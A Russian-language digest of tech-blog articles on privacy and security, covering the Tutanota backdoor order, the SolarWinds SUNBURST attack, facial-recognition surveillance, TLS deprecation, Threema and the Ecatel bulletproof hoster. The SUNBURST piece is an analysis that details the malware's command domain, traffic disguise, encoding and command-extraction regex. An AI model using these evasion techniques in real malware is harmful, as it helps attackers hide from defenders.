Tutanota уверяет, что данный инцидент ничего изменит для других пользователей. Их почта по-прежнему будет шифроваться по умолчанию при поступлении на сервер. Тем не менее, компания считает однократный обход шифрования угрозой для защиты данных и для безопасности для всех клиентов.

Вот схема, как выполняется шифрование и хранение писем на сервере в случае использования сквозного шифрования (слева) и без него (справа):



В отличие от PGP, выполняется шифрование и некоторых метаданных, а не только тела письма.



Компания подчёркивает, что бэкдор позволит просмотреть содержимое только новых входящих незашифрованных писем. Он не может расшифровать данные, зашифрованные ранее, а также другие письма со сквозным шифрованием в Tutanota. Условно говоря, бэкдор представляет собой такой алгоритм:

 def encrypt_mail(email):if email.user=="badperson":store(email)else:store(encrypt(email))

Возможно, ганноверская Tutanota теперь жалеет, что не выбрала иную юрисдикцию. С другой стороны, эту историю можно рассматривать как своеобразный пиар для компании, которая старается сделать всё, что в её силах. В одном из интервью они говорят, что могут рассмотреть переезд в другую страну (Швейцарию), но это вряд ли случится: Правовая ситуация и конституция Германии в основном очень хорошие и защищают конфиденциальность людей. Общественная активность также помогает нам предотвратить или ослабить проблемные законы (слежку).

Компания периодически публикует отчёт о прозрачности и свидетельство канарейки для своего сервиса. Свидетельство канарейки единственный способ легально разгласить информацию, которую запрещено разглашать.



Шифрование единственная причина, по которой полиция вообще использовала судебную процедуру. Некоторые считают, что на открытых каналах они бы применяли прослушку более широко, не утруждая себя получением разрешений. И только криптография защищает общество от произвола правоохранительных органов.



Подробнее..

Хакеры SolarWinds размазали свои байты в HTTP-трафике через регулярные выражения

21.12.2020 00:08:29 | Автор: admin

Валидная цифровая подпись на DLL со встроенным бэкдором

Практически по всем профильным СМИ прошла новость о взломе программного обеспечения SolarWinds в рамках глобальной кампании кибершпионажа. Здесь нужно понимать масштаб атаки: этот софт для мониторинга IT-инфраструктуры (CPU, RAM, сеть) используют тысячи частных компаний и государственных учреждений, включая АНБ, Пентагон, Госдеп и проч. В общей сложности 300 000 клиентов по всему миру (данная страница уже удалена с официального сайта SolarWinds, по ссылке копия из веб-архива).

Самое интересное в этой атаке: 1) внедрение бэкдора внутрь обновлений SolarWinds и 2) оригинальный механизм сокрытия данных в служебном HTTP-трафике программы SolarWinds. В двух словах расскажем о методе стеганографии (covert signaling), который здесь применялся.

Отдельные подробности об атаке опубликовала компания FireEye в отчёте от 13 декабря 2020 года. Эта американская компания должна защищать сети своих клиентов от подобных диверсий, но в итоге и сама пострадала от взлома вместе с ними.

Некоторые из клиентов SolarWinds:



Основные факты


  • Бэкдор обнаружен спустя семь месяцев после начала атаки, ему присвоено кодовое название SUNBURST. Учитывая масштаб заражения, это серьёзный фейл антивирусных компаний.
  • Заражённая DLL распространялась с обновлениями платформы SolarWinds Orion, которая служит для мониторинга корпоративной сети.


    Платформа SolarWinds Orion

Валидная цифровая подпись


Бэкдор обнаружен в библиотеке SolarWinds.Orion.Core.BusinessLayer.dll, которая подписана действительной цифровой подписью компании SolarWinds Worldwide, LLC (скриншот выше).

В частности, инфицирован ряд обновлений программы SolarWinds Orion за март-май 2020 года, которые распространялись с действительной цифровой подписью.

Это был стандартный файл Windows Installer Patch со всеми обычными ресурсами, включая заражённую библиотеку SolarWinds.Orion.Core.BusinessLayer.dll. После установки библиотека нормально загружалась в память штатным экзешником SolarWinds.BusinessLayerHost.exe.

Специалисты Microsoft пояснили, что злоумышленники использовали локальный взлом [on-premises compromise], чтобы получить доступ к доверенному сертификату подписи SAML-токенов организации [SolarWinds]. Это позволило им подделать токены SAML для всех существующих пользователей и аккаунтов организации, включая высокопривилегированные. Судя по всему, речь о физическом проникновении в офис компании (on-premises compromise).

Уникальные особенности


  • Алгоритм Domain Generation Algorithm (DGA) для генерации поддоменов и изменения DNS-запросов. Троян отправлял запрос на резолв поддомена avsvmcloud[.]com, а в DNS-ответе содержалась запись CNAME с указанием командного сервера.
  • Весь трафик маскировался под сетевой трафик по служебному протоколу Orion Improvement Program (OIP) через SolarWinds API. Таким образом, антивирусы и файрволы не могли отличить активность бэкдора от настоящей активности программы SolarWinds.
  • Программный код бэкдора внедрялся в стандартные программные компоненты.

Стеганография


А вот самая интересная часть как именно бэкдор маскировал пакеты в обычном сетевом трафике:

Для получения данных зловред использовал запросы HTTP GET или HTTP HEAD, и для отправки HTTP PUT или HTTP POST. Метод PUT использовался, когда полезная нагрузка меньше 10000 байт; в противном случае используется POST. HTTP-заголовок If-None-Match содержит заксоренное представление userID, вычисленного ранее, с добавлением случайного массива байтов той же длины.

Полезная нагрузка JSON в запросах HTTP POST и PUT содержит ключи userId, sessionId и steps. Сообщения с данными для отправки на сервер сжаты DEFLATE и однобайтовым XOR. Каждое сообщение отдельно кодируется Base64.

В наблюдаемом трафике тела HTTP-ответов скрываются под доброкачественные XML, связанные со сборками .NET. Но на самом деле данные распределены по многим строкам GUID и HEX. Команды извлекаются из тел HTTP-ответов путём поиска hex-строк с использованием следующего регулярного выражения: \{[0-9a-f-]{36}\}"|"[0-9a-f]{32}"|"[0-9a-f]{16}. Командные данные распределены по нескольким строкам, замаскированным под строки GUID и HEX. Все совпадающие подстроки в ответе фильтруются на наличие символов не-HEX, объединяются вместе и декодируются HEX. Первое значение DWORD показывает фактический размер сообщения, за которым сразу же следует сообщение, а затем необязательные мусорные байты. Извлечённое декодируется однобайтным XOR с использованием первого байта сообщения, а затем разархивируется DEFLATE. Первый символ это целое число ASCII, которое соответствует команде JobEngine с необязательными дополнительными аргументами, разделёнными пробелами.

Заказчик
В случае таких продвинутых атак невозможно установить разработчиков программы. Исследователи делают предположения на основании совпадения кода с ранее обнаруженными хакерскими инструментами, а также исходя из того, кто именно стал жертвой шпионажа.

Например, в 2010 году были повреждены иранские установки для обогащения урана. Очень продвинутый зловред Stuxnet слегка менял скорость вращения установок и в конце концов вывел их из строя. Соответственно, логично предположить, что заказчиками и разработчиками зловредров были спецслужбы США и Израиля, поскольку эти страны планомерно пытаются помешать изготовлению ядерного оружия в Иране, действуя не всегда дипломатическими методами.

Что касается бэкдора SUNBURST, то его приписывают скорее российским хакерам из группировки APT29 (Cozy Bear), исходя из хитроумности применяемых техник, выбора целей и физического проникновения в офис жертвы. Хотя достоверно заказчик и исполнитель не известны.

Правила Snort для обнаружения и блокировки трафика SUNBURST опубликованы в свободном доступе.


Подробнее..

Атака на Капитолий не оправдывает расширение слежки за населением

17.01.2021 18:05:05 | Автор: admin


После нападения на Капитолий правоохранительные органы работают сверхурочно, чтобы установить виновных и привлечь их к ответственности за попытку восстания. В распоряжении спецслужб есть много инструментов. И они уже начали использовать систему распознавания лиц. Возможно, даже запускают ClearView AI.

Сейчас от множества возмущённых граждан раздаются призывы использовать данные с вышек сотовой связи, лишь бы найти и наказать виновных.

Но важно понимать. Долговременный ущерб от нападения исходит не от самой толпы и того, что они сделали, а от того, как отреагирует общество.

В течение нескольких дней после нападения комментарии в СМИ дали многие бывшие сотрудники правоохранительных органов, утверждающие, что нужно использовать разные методы слежки. Например, об этом в комментариях говорят спецагенты ФБР в отставке Дэнни Коулсон и Даг Коунс. Даже многие из тех, кто обычно критически относится к полицейской деятельности, тоже вскочили на подножку и вместе с остальными теперь выступают за слежку в стремлении найти справедливость.

Но главное вот в чём. Наделение полиции ещё большими полномочиями в этом кризисе станет гигантской ошибкой.

Фонд электронных рубежей (EFF) выступил категорически против применения технологии распознавания лиц, как это делает сейчас ФБР. А именно, когда фотографии неопознанных лиц сравниваются с базами данных фотографий известных лиц. EFF считает, что в этом подходе слишком много рисков и проблем, как технически, так и юридически, чтобы оправдать его использование.



Использование государством распознавания лиц пересекает важную красную черту, и мы не должны разрешать рутинное его использование даже во время национальной трагедии, пишет EFF. Конечно, нападение на Капитолий может и должно быть расследовано. Но злоумышленники использовали общедоступные социальные сети как для подготовки, так и для документирования своих действий. Это значительно упрощает расследование. Запрет на любое государственное использование распознавания лиц, включая его использование правоохранительными органами, остаётся необходимой мерой предосторожности, чтобы защитить нас от этой опасной технологии.

Одним из сторонних сервисов по распознаванию лиц является ClearView AI. Он позволяет загружать фотографию неустановленного лица и получать публично опубликованные фотографии этого человека. Сообщается, что в последние дни нагрузка на сервис сильно возросла. Образцы фотографий в базе ClearView собраны без согласия миллионов пользователей по всему интернету, с Facebook, YouTube, Venmo и так далее. Там есть отпечатки лиц примерно 3 млрд человек.


ClearView AI

EFF выступает против того, чтобы полиция использовала ClearView, и подала экспертное заключение об этом для иска Американского союза гражданских свобод. В иске утверждается, что эта технология отпечатков лиц без согласия нарушает закон штата Иллинойс о конфиденциальности биометрической информации (BIPA).

Это не вопрос Что произойдёт, если распознавание лиц будет использовано против вас? Вопрос в том, сколько раз правоохранительные органы уже делали это.

EFF также выступает против идентификации людей через записи сотовых операторов всех абонентов, кто присутствовал на локации. Такой метод тоже предлагают некоторые горячие головы.



У подобных методов много проблем, считает EFF, начиная с того, что пользователи часто находятся не там, где указано в записях, и заканчивая вовлечением невинных людей. Четвёртая поправка к Конституции принята специально для того, чтобы предотвратить подобные чрезмерные меры.

Широкое использование государством технологии распознавания лиц в реальном времени коренным образом изменит общество, в котором мы живём. Фонд электронных рубежей.

Многочисленные исследования показали, что когда люди думают, что правительство следит за ними, они меняют своё поведение, чтобы избежать пристального внимания.

Использование государством технологии распознавания лиц пересекает красную черту, и мы не должны нормализовать его использование даже во время национальной трагедии, считает EFF. Реагируя на это беспрецедентное событие, мы должны вдумчиво рассмотреть не только неожиданные последствия, которые может иметь любое новое законодательство, но и опасности, связанные с такими методами слежки. Эти технологии представляет серьёзную угрозу приватности и фундаментальной свободе вести свою жизнь без скрытого мониторинга и анализа всех действий человека.

Чтобы найти участников этого нападения, не нужны сверхсовременные системы слежки: они сами выследили себя. Они транслировали свои преступления в прямом эфире из залов Конгресса, записывая каждое преступление в full HD. Чтобы найти виновных, не нужны распознавание лиц и геозоны по сотовым вышкам, нужна просто нормальная полицейская работа.


Подробнее..

GlobalSign выпустила первый в мире кроссплатформенный агент для управления сертификатами под Windows, macOS и Linux

28.01.2021 02:19:40 | Автор: admin


19 января 2021 года компания GlobalSign объявила о выходе AEG 6.4 новой версии шлюза автоматической регистрации Auto Enrollment Gateway, вместе с которым представлена маленькая, но уникальная программка: кроссплатформенный агент для автоматической выдачи и управления сертификатами под Windows, Mac OS и Linux. Компания заявляет, что это первое такое предложение от любого удостоверяющего центра в мире.

Агент регистрации


Кроссплатформенный агент регистрации небольшая программа, которая устанавливается на устройстве и использует протокол ACME или SCEP для связи с AEG. Во многих случаях агент также обеспечивает соблюдение определённых отраслевых правил или национальных нормативных актов. Кроме того, агент устраняет барьеры для S/MIME, поскольку работает на любой платформе и операционной системе, что также повышает масштабируемость. Например, если из компании увольняется сотрудник, то его ключи автоматически архивируются.

Агент регистрации легко устанавливается на любом клиенте или сервере Windows, macOS и Linux. Утилита помогает устанавливать политики управления сертификатами и управлять с помощью интуитивно понятной панели мониторинга AEG.



Кроме того, агент автоматически выдаёт и контролирует сертификаты. Это великолепно масштабируемый метод развёртывания сертификатов на устройствах, машинах, клиентах S/MIME и серверах организации.

Установка агентов на своих конечных точках даёт организации больший охват и контроль над всей своей сетью, говорит Лила Ки, генеральный директор отдела операций в Северной и Южной Америке GlobalSign. Это также означает, что пользователям и администраторам больше не нужно полагаться на сложные методы регистрации сертификатов, что в конечном итоге улучшает управление сертификатами. Мы действительно ставим последнюю точку в автоматизации этого процесса. AEG 6.4 идеально подходит для организаций, которые хотят начать или оптимизировать удалённую работу, обеспечить безопасность сетей BYOD и автоматизировать функции PKI, которые потребляют время и ресурсы в ручном управлении.

Что такое Auto Enrollment Gateway


Auto Enrollment Gateway это полностью автоматизированное PKI-решение, которое интегрирует PKI непосредственно с Active Directory, поэтому в среде Windows можно автоматизировать выпуск сертификатов и управление ими без необходимости поддерживать собственный удостоверяющий центр. Поддержка протоколов SCEP и ACME v2 расширяет использование сертификатов за пределы домена Windows, позволяя автоматизировать сертификацию для серверов Linux, а также мобильных, сетевых и других устройств.



Передавая услуги по шифрованию и управлению сертификатами доверенному удостоверяющему центру, компания снижает риски, связанные с управлением и поддержанием работы собственной инфраструктуры PKI.

Если требуются публичные доверенные сертификаты (например, для отправки за пределы компании зашифрованных или скреплённых электронной подписью электронных писем), можно получить такой сертификат не через приватный корневой удостоверяющий центр, а через публичный доверенный корневой удостоверяющий центр GlobalSign.

При подаче заявки на сертификат закрытый ключ защищённым образом отправляется на выделенный локальный сервер и архивируется на нём. Архивация и восстановление ключа принципиально важны при использовании протокола S/MIME и помогают избежать безвозвратной потери зашифрованных данных в случае, если оригинальный ключ шифрования более не доступен.

В целом для многих компаний AEG более безопасное и удобное решение, чем управлять собственным удостоверяющим центром. Собственный УЦ в конечном счёте очень дорого обходится, если учесть зарплаты специалистов и обслуживание серверов. В то же время AEG автоматизирует выдачу и обслуживание сертификатов любых типов, в том числе:

  • Вход в систему с помощью смарт-карт
  • Электронные подписи в документах Microsoft Office,
  • Подпись кода
  • Защита электронных сообщений
  • SSL/TLS
  • Система шифрования данных Encrypted File System (EFS) на уровне файлов в операционных системах
  • Аутентификация пользователей
  • Аутентификация устройств
  • Мобильная аутентификация
  • и т.д.

Шлюз AEG идеально подходит для любой компании с более чем 500 сотрудниками и/или устройствами, а также для тех, кто использует Microsoft Active Directory. Управление PKI и автоматизация особенно востребованы в нынешних условиях, которые требуют от сотрудников удалённой работы.

AEG 6.4 также реализует опции безопасности, в которых сейчас нуждаются компании: S/MIME для безопасной электронной почты, удалённая сетевая аутентификация и инструменты для управления всем этим. Это снижает нагрузку на IT-отдел, экономит время и деньги ресурсов, а также значительно повышает уровень безопасности компании.
Подробнее..

На что соглашается человек, когда разрешает все куки

25.02.2021 00:07:45 | Автор: admin
Люди не читают инструкций. Вы почти наверняка не читали лицензионное соглашение Windows, не читали лицензионное соглашение iTunes, не читали условия Linux GPL или любого другого программного обеспечения.

Это нормально. Такова наша природа.

То же самое происходит в интернете. В последнее время благодаря GDPR и другим законам часто приходится видеть всплывающие сообщения, где вас спрашивают разрешения на использование cookies.



Большинство нажимает Согласиться и продолжает жить как ни в чём ни бывало. Никто ведь не читает политику конфиденциальности, верно?

Разработчик Конрад Акунга (Conrad Akunga) решил разобраться, какие конкретно условия предусмотрены соглашением об использовании. Для примера он взял новостной сайт Reuters. Это абсолютно произвольный пример, у большинства других сайтов тоже есть свои правила.

Вот эти правила:


Обратите внимание на полосу прокрутки. Дальше идёт продолжение.

Ещё шесть экранов с текстом











Если вкратце, документ информирует пользователя о нескольких вещах:

  • Что веб-сайт собирает и обрабатывает данные
  • Что для этого он работает с различными партнёрами
  • Что сайт хранит некоторые данные на вашем устройстве с помощью файлов cookie
  • Что некоторые файлы cookie строго необходимы (определяется сайтом). Их нельзя отключить.
  • Некоторые персональные данные могут быть проданы партнёрам для предоставления соответствующего контента
  • Вы можете персонализировать рекламу, но не удалить её

Вероятно, все эти запутанные меню компания разработала, чтобы создать некую видимость прозрачности, открытости к диалогу. Но вы всё равно не можете отключить основные cookie, поскольку они нужны для работы сайта.

Вы также не можете полностью отключить рекламу. Таким образом, ваш единственный выбор либо смотреть рекламу, выбранную случайным образом, либо рекламу, которая, по мнению провайдера, может иметь к вам какое-то отношение.

И ещё один пункт о партнёрах, которым продаются ваши персональные данные. Список партнёров общий для всех сайтов, которые сотрудничают с IAB.

Кто же эти партнёры?

Если нажать на соответствующую кнопку, то появится следующее окно:


Обратите внимание, насколько маленький ползунок на полосе прокрутки. Наверное, там их сотни. Под названием каждой компании ссылка на политику конфиденциальности.


Это не одна и та же ссылка, а разные! Каждая из них ведёт на уникальную политику конфиденциальности каждого партнёра. Сколько человек на самом деле пойдёт по этим ссылкам вручную, чтобы прочитать условия? Это просто нереально.

Конрад Акунга воспользовался инструментами разработчика Chrome, чтобы извлечь реальный список партнёров со ссылками на условия конфиденциальности каждого из них.



Скопированный список он вставил в VSCode и получил огромный файл на 3835 строк, который после форматирования (Alt + Shift + F) разбился в чудовище на 54 399 строк.



Конрад написал программку, которая с помощью регулярных выражений извлекает нужные фрагменты данных названия компаний с URL и генерирует результат в формате Markdown по шаблону.

Log.Logger = new LoggerConfiguration().WriteTo.Console().CreateLogger();// Define the regex to extact vendor and urlvar reg = new Regex("\"vendor-title\">(?<company>.*?)<.*?vendor-privacy-notice\".*?href=\"(?<url>.*?)\"",RegexOptions.Compiled);// Load the vendors into a string, and replace all newlines with spaces to mitigate// formatting issues from irregular use of the newlinevar vendors = File.ReadAllText("vendors.html").Replace(Environment.NewLine, " ");// Match against the vendors html filevar matches = reg.Matches(vendors);Log.Information("There were {num} matches", matches.Count);// extract the vendor number, name and their url, ordering by the name first.var vendorInfo = matches.OrderBy(match => match.Groups["company"].Value).Select((match, index) =>new{Index = index + 1,Name = match.Groups["company"].Value,URL = match.Groups["url"].Value});// Create a string builder to progressively build the markdownvar sb = new StringBuilder();// Append headerssb.AppendLine($"Listing As At 30 December 2020 08:10 GMT");sb.AppendLine();sb.AppendLine("|-|Vendor| URL |");sb.AppendLine("|---|---|---|");// Append the vendor detailsforeach (var vendor in vendorInfo)sb.AppendLine($"|{vendor.Index}|{vendor.Name}|[{vendor.URL}]({vendor.URL})|");// Delete existing markdown file, if presentif (File.Exists("vendors.md"))File.Delete("vendors.md");//Write markdown to fileFile.WriteAllText("vendors.md", sb.ToString());

В результате получился список всех партнёров, и у каждой свой уникальный документ c условиями конфиденциальности. Вот этот список: vendors.md.

В нём 647 компаний.

Очевидно, что никто не сможет ознакомиться со всеми этими условиями прежде, чем нажать кнопку Согласиться, делает вывод автор.

Помните, что эти рекламные провайдеры предоставляют одни и те же услуги разным сайтам. Они однозначно идентифицируют браузер и устройство, поэтому могут анализировать и отслеживать ваши действия на разных сайтах для создания максимально точного профиля. На каждого якобы анонимного пользователя собираются большие объёмы данных.

Код для парсинга из этой статьи опубликован на Github.
Подробнее..

Опубликованы исходники швейцарского криптомессенджера Threema

18.03.2021 22:21:23 | Автор: admin

Архитектура веб-клиента Threema, источник

Защищённый мессенджер Threema открыл исходный код и инструкции по воспроизводимой сборке приложений. Опубликованы 12 репозиториев для клиентов Android, iOS, веб-версии, рилеев нотификаций и других компонентов. Это важнейшее событие в истории компании Threema GmbH, которая с публикацией исходников выходит на новый уровень разработки.

На фоне массового исхода пользователей WhatsApp платный мессенджер Threema стал одним из самых скачиваемых приложений в мире, вместе с Telegram, Signal и Element (децентрализованная сеть Matrix), см. также статью Какое шифрование лучше: Signal или Telegram?.

Threema наименее известна в этой плеяде. Зато у неё есть одно преимущество перед конкурентами швейцарская юрисдикция.

Threema сервис для обмена сообщениями, который реализует сквозное шифрование коммуникаций (E2EE). Поддерживаются аудио- и видеозвонки, обмен файлами и другие возможности современных мессенджеров.

Есть версии для Android, iOS и веба. Отдельного десктопного приложения, в том числе под Linux, пока не разработано.

Интересно, что исходники на Github обновляются только с обновлением клиентов, то есть один коммит = один релиз. Пул-реквесты и баги в репозиториях Github не принимаются, только по почте.

Юрисдикция это важно


Threema развивается швейцарской компанией Threema GmbH. Серверы проекта тоже в Швейцарии. Именно швейцарская юрисдикция главное преимущество Threema перед Signal (США) и Telegram (США, Великобритания, разработка переезжает по офисам в разных странах, сейчас находится в ОАЭ, основатели и программисты преимущественно из России, инвесторы из России и других стран, кроме США).

Юрисдикция управляющей компании вовсе не второстепенный вопрос, когда у властей возникают претензии к отдельным пользователям, клиентам сервиса. Например, в США действуют законы, по которым компания обязана секретно внедрить бэкдоры в свои продукты и сервисы и реализовать слежку за пользователями, если секретный суд примет такое решение.

Это касается и любых криптографических сервисов, даже опенсорсных и самых защищённых на архитектурном уровне. Очень важно, что компания не имеет права предупреждать пользователей о таких действиях. Фактически, в этой ситуации у неё единственный вариант защиты пользователей: закрыться и прекратить оказание услуг.

Многие помнят историю почтового сервиса Tutanota, которого немецкий суд заставил установить бэкдор для расшифровки почты определённого пользователя. Владельцы ганноверской компании тогда жалели, что не выбрали иную юрисдикцию. В одном из интервью они сказали, что рассматривают переезд в Швейцарию, хотя правовая ситуация в Германии не такая плачевная: Правовая ситуация и конституция Германии в основном очень хорошие и защищают конфиденциальность людей. Общественная активность также помогает нам предотвратить или ослабить проблемные законы (слежку).

В США правовая ситуация гораздо хуже, особенно после 9/11. В августе 2013 года был вынужден закрыться почтовый сервис Lavabit. Основатель и владелец сервиса Ладар Левисон (Ladar Levison) сказал, что принял это решение после долгих раздумий:

Я бы хотел иметь легальную возможность рассказать вам о всех событиях, которые привели к такому моему решению, но я не могу. Я чувствую, что вы заслуживаете знать, что происходит. Первая поправка должна гарантировать мне свободу слова в ситуациях вроде этой. К сожалению, Конгресс принял законы, которые говорят обратное. На данном этапе я не могу поделиться событиями последних шести недель, хотя я дважды отправлял соответствующие запросы [чтобы мне разрешили это сделать], написал основатель Lavabit Ладар Левисон. Он не вдаётся в подробности своего дела, но обращается ко всем пользователям: Минувшие события преподали мне один очень важный урок: до решения Конгресса или чёткого судебного прецедента я _очень_ не рекомендую кому-либо доверять персональные данные компании, которая физически привязана к США.

О правовой ситуации в странах с менее развитой судебной системой нечего и говорить. В государствах вроде РФ правовые гарантии конфиденциальности как таковые практически отсутствуют. То есть доверять приватные данные российской компании самый огромнейший риск среди всех, которые можно представить.

В такой ситуации вопрос юрисдикции конкретного веб-сервиса становится ключевым. В мире осталось не так много мест, где права человека ценятся выше, чем права государства.

Threema GmbH швейцарский стартап, который получил финансирование от немецко-швейцарской инвестиционной компании Afinum Management AG. Основатели компании три программиста Мануэль Каспер (Manuel Kasper), Сильван Энгелер (Silvan Engeler) и Мартин Блаттер (Martin Blatter).

Программисты-основатели стартапа считают, что публикация исходного кода ключевой и важнейший этап в развитии компании.

Разработчики обещают выпустить полноценный десктопный клиент, в том числе под Linux, которым можно будет пользоваться без смартфона: Безопасность и защита приватности глубоко укоренились в ДНК Threema, поэтому наш код регулярно проходил внешний аудит (см. результаты аудита за ноябрь 2020 года). Благодаря открытым исходникам любой желающий может самостоятельно проверить безопасность Threema и убедиться, что опубликованный исходный код соответствует загруженному приложению. В будущем благодаря инновационному решению с несколькими устройствами можно будет использовать несколько устройств параллельно. В отличие от других подходов, на сервере не останется никаких следов персональных данных. Благодаря этой технологии Threema можно использовать на ПК без смартфона. В итоге, Threema станет ещё более надёжным и ещё более удобным приложением.

В отличие от Telegram, серверы Threema не хранят сообщения и файлы пользователей, поэтому здесь расходы на инфраструктуру минимальны.

Дополнительно:





Подробнее..

IETF официально прекратил поддержку протоколов TLS 1.0 и 1.1

25.03.2021 00:06:26 | Автор: admin

CC-BY-CA Vadim Rybalko, на основе мема

Рабочая группа инженеров Интернета IETF признала устаревшими протоколы шифрования TLS 1.0 и 1.1. Соответствующие стандарты RFC официально получили исторический статус с пометкой deprecated.

Пометка deprecated означает, что IETF настоятельно не рекомендует использовать эти протоколы. В целях безопасности требуется отключить поддержку TLS 1.0 и 1.1 везде, где это возможно. Об этом говорится в опубликованном RFC 8996. Почему нельзя поддерживать протоколы TLS 1.0 и 1.1 подробно объясняется в пунктах 3, 4 и 5 этого документа.



Согласно объяснению IETF, удаление поддержки более старых версий из библиотек и программного обеспечения уменьшает поверхность атаки, уменьшает возможность неправильной конфигурации и упрощает обслуживание библиотеки и продукта.

Одновременно со старыми версиями TLS также признаётся устаревшим протокол Datagram TLS (DTLS) версии 1.0 (RFC 4347), и только он, поскольку версия 1.1 не выходила.

Стандарту TLS 1.0 в этом году исполнилось 22 года. С момента его принятия стало лучше понятно, как следует проектировать протоколы шифрования. Выросли требования к надёжности шифров. К сожалению, TLS 1.0 и 1.1 не соответствуют этим требованиям.

Самое плохое, что TLS 1.0 и 1.1 не поддерживают работу с современными криптографическими шифрами. Например, при рукопожатии в них обязательно применяется алгоритм хэширования SHA-1. В этих версиях TLS невозможно установить более сильный алгоритм хэширования для подписей ServerKeyExchange или CertificateVerify.

Черновик данного RFC 8996 был опубликован 14 сентября 2018 года. В числе прочего, там упоминается, что алгоритм SHA-1 с криптостойкостью 2^77 нельзя считать безопасным по современным меркам: 2^77 операций [для атаки] это ниже допустимой границы безопасности.



Речь идёт об атаке BEAST (Browser Exploit Against SSL/TLS) на TLS 1.0 и 1.1, а точнее на блочные шифры, где в качестве вектора инициализации для сообщения n используется последний блок шифрования предыдущего сообщения (n-1).

Разработчики всех ведущих браузеров сразу согласились выполнить рекомендации IETF.

Браузер Chrome первым отказался от поддержки старых версий TLS в январе 2019 года. Начиная версии 79 для устаревших протоколов выводилось предупреждение в консоли DevTools, а полное отключение запланировали на версию Chrome 81 в марте 2020 года (предварительные версии с января 2020 года). Одновременно отказ от TLS 1.0 и 1.1 анонсировали Microsoft, Mozilla и Apple.

Правда, всё пошло не по плану. В марте 2020 года Firefox временно отказался удалять поддержку TLS 1.0 и 1.1. Формально это было сделано из-за коронавируса (см. скриншот ниже), но фактически разработчики Mozilla побоялись, что коллеги из Google пойдут на попятную и оставят поддержку TLS 1.0 и 1.1, так что Firefox станет единственным браузером без этой поддержки.



Но в итоге поддержку старых протоколов в браузерах всё-таки отключили. В случае необходимости в Firefox можно изменить настройку security.tls.version.enable-deprecated.

Постепенно TLS 1.0 и 1.1 удаляют из приложений и сервисов. Это сделали Amazon, CloudFlare, GitHub, KeyCDN, PayPal и другие веб-сервисы. С 15 января 2020 года поддержка старых протоколов отключена на ресурсах Хабра.
Подробнее..

Дата-центр возле Амстердама называют выгребной ямой интернета, но он продолжает работу

06.04.2021 04:10:16 | Автор: admin

Дата-центр Ecatel в Северной Голландии, источник

Это история защищённого хостинга Ecatel с дата-центром в городке Вормер (13 км в северо-западу от Амстердама). Хостер специализируется на конфиденциальности, то есть принципиально не проверяет благонадёжность клиентов, не реагирует на запросы американских правообладателей по закону DMCA и не сотрудничает с правоохранителями. Его называют выгребной ямой интернета.

Ecatel много лет находится под следствием в связи с DDoS-атаками, распространением вредоносных программ, спама и детской порнографии (CP). Но голландским властям ничего не удаётся сделать, потому что по голландским законам хостер рассматривается просто как поставщик технического сервиса (например, как провайдер электричества), поэтому не обязан проверять своих клиентов.

Ecatel неоднократно входил в топ худших хостеров мира по версии Host Exploit. Но никто не может доказать факты прямого сотрудничества с преступниками.

Сейчас голландское издание NRC задаётся вопросом: как такое возможно, что хостер работает с 2002 года без особых проблем?

За прошедшие почти два десятилетия изменился только список агентств, которые заинтересовались деятельностью компании, полиция, служба финансовой разведки и расследований (FIOD), минюст и Европол. Список только увеличился. Владельцы Ecatel два бизнесмена из Гааги, которые приезжают в Вормер раз в неделю на машине: Бап К., 75-летний мужчина в тонированных очках, и его 34-летний партнёр по бизнесу Рейнье ван Э., крупный, лысый, мускулистый мужчина в спортивном костюме (в 2002 году этого 16-летнего подростка пригласили в бизнес для решения технических вопросов). Бизнесмены часто берут с собой на работу двух собак, которые лают на прохожих из палисадника центра обработки данных, пишет NRC.

Когда Рейнье достиг совершеннолетия, бизнесмены основали британскую компанию с ограниченной ответственностью Ecatel, а также множество хостинговых компаний-пустышек: Novogara, DataZone, Reba Communications, FiberXpress, B&R Holding, iQarus, Incrediserve, Linkup и др. Некоторые компании ведут точно такую же деятельность с того же адреса, но под другими названиями. Другие предлагают сдавать серверы в субаренду, словно взяли их в аренду у Ecatel. В сеть грязного хостера входят ещё компании вроде Quasi Networks и IP Volume с анонимными директорами на Сейшельских островах. Если какого-то клиента блокируют у одного хостера, он переходит к субарендатору.

Свой дата-центр в провинции Северная Голландия партнёры открыли в 2011 году.


Дата-центр Ecatel, источник

С самого начала бизнеса на хостинговые компании не прекращается поток жалоб в связи с размещением преступного контента.

Рейнье и Бап игнорируют жалобы. Более того, даже со своими клиентами они обращаюся довольно грубо. Например, один из клиентов рассказывал, что однажды пришёл, чтобы забрать свои серверы, а Рейнье потребовал от него сначала выплатить долг а потом гонялся за ним с топором. Клиент не сообщил о случившемся в полицию, потому что сам немного подбил Рейнье своим автомобилем.

Бизнес-модель Ecatel за эти годы не изменилась: ничего не знаем, ни на что не отвечаем, препятствуем любому сотрудничеству с правоохранительными органами.

И это работает, потому что по голландскому законодательству хостинговая компания не может быть привлечена к ответственности за действия тех, кто арендует её серверы. Хостинговая компания не обязана знать содержимое каждого сервера.


Дата-центр Ecatel, источник

Когда Ecatel получает официальный запрос из США на удаление защищённых авторским правом материалов по закону DMCA, его просто выбрасывают в мусорную корзину, говорят свидетели. Субарендаторы даже рекламируют эту услугу полного игнорирования DMCA. Никаких проблем нет и у спамеров.

На все претензии правообладателей и других пострадавших Ecatel требует оформить жалобу в письменном виде и прислать в официальном порядке, максимально затягивая процедуру и общаясь с правообладателями в весёлом тоне, пишет NRC.

Например, через Ecatel долгое время работал крупный ботнет, нелегально транслировались матчи английской Премьер-лиги по футболу и совершались другие преступления. Голландская полиция регулярно навещает дата-центр в Вормере, чтобы скопировать данные с серверов, но Бап и Рейнье обычно не обращают на них внимания. Они чувствуют себя неуязвимыми: приглашают полицейских выпить чашечку кофе и предлагают экскурсию с гидом по дата-центру. Во время осмотра дизельного генератора Рейнье с улыбкой заявил полицейским, что сам запрограммировал его и дал электрику взятку в несколько сотен евро, чтобы тот поставил пломбу.


Дата-центр Ecatel, источник

Бывают и другие случаи, когда визиты проходят менее гладко, и полицейские угрожают выломать двери, но всё это остаётся игрой в кошки-мышки без особенных последствий. По словам источников, прокуратура не заинтересована в серьёзном уголовном расследовании, которое докажет злой умысел в действиях Бапа и Рейнье.

Положение дел немного изменилось после 2017 года, когда на пост министра юстиции заступил Ферд Грапперхаус из консервативной партии CDA. Говорят, он был потрясён лидерством Нидерландов в мировом рейтинге детской порнографии. Министерство инициировало ряд мер, в том числе запустило техническую систему обнаружения детской порнографии (CP) сервер проверки хэшей, к которому могут подключаться хостинговые компании. Изображения, обнаруженные в ходе уголовных дел в Нидерландах и других странах, вносятся в систему и должны быть немедленно удалены.

